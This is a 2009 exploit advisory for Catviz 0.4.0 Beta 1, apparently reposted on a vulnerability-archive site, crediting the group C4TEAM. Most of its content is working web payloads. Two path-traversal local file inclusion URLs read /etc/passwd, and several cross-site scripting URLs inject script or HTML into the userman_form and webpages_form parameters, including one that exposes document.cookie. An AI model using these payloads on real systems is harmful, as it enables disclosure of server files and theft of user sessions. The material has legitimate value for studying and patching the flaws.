Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities

2009.05.24
Credit: ByALBAYX
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1748 | CVE-2009-1749
CWE: CWE-22

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @===C4TEAM.ORG====ByALBAYX====C4TEAM.ORG====@ @~~=======================================~~@ @~~=Author : ByALBAYX @ @ @ @~~=Website : WWW.C4TEAM.ORG @ @ @ @@@@@@@@@@@@@@@@@@TURKISH@@@@@@@@@@@@@@@@@@@@ @ @ _.--"""""--._ @ .' '. @ / \ @ ; C4TEAM ; @ | | @ | | @ ; ; @ \ (`'--, ,--'`) / @ \ \ _ ) ( _ / / @ ) )(')/ \(')( ( @ (_ `""` /\ `""` _) @ \`"-, / \ ,-"`/ @ `\ / `""` \ /` @ |/\/\/\/\/\| @ |\ /| @ ; |/\/\/\| ; @ \`-`--`-`/ @ \ / @ ',__,' @ @ Catviz 0.4.0 Beta 1 @ @ Demo: @ @ http://catviz.sourceforge.net @ @ @ LFI :/ @ @ http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00 @ @ http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00 @ @ @ @ XSS :/ @ @ @ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script> @ @ http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script> @ @ http://c4team.org/ [Path] /index.php?userman_form="><script>alert(document.cookie)</script> @ @ http://c4team.org/ [Path] /index.php?webpages_form="><script>alert(document.cookie)</script> @ @ http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none> @ @ http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none> @ @@@:/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top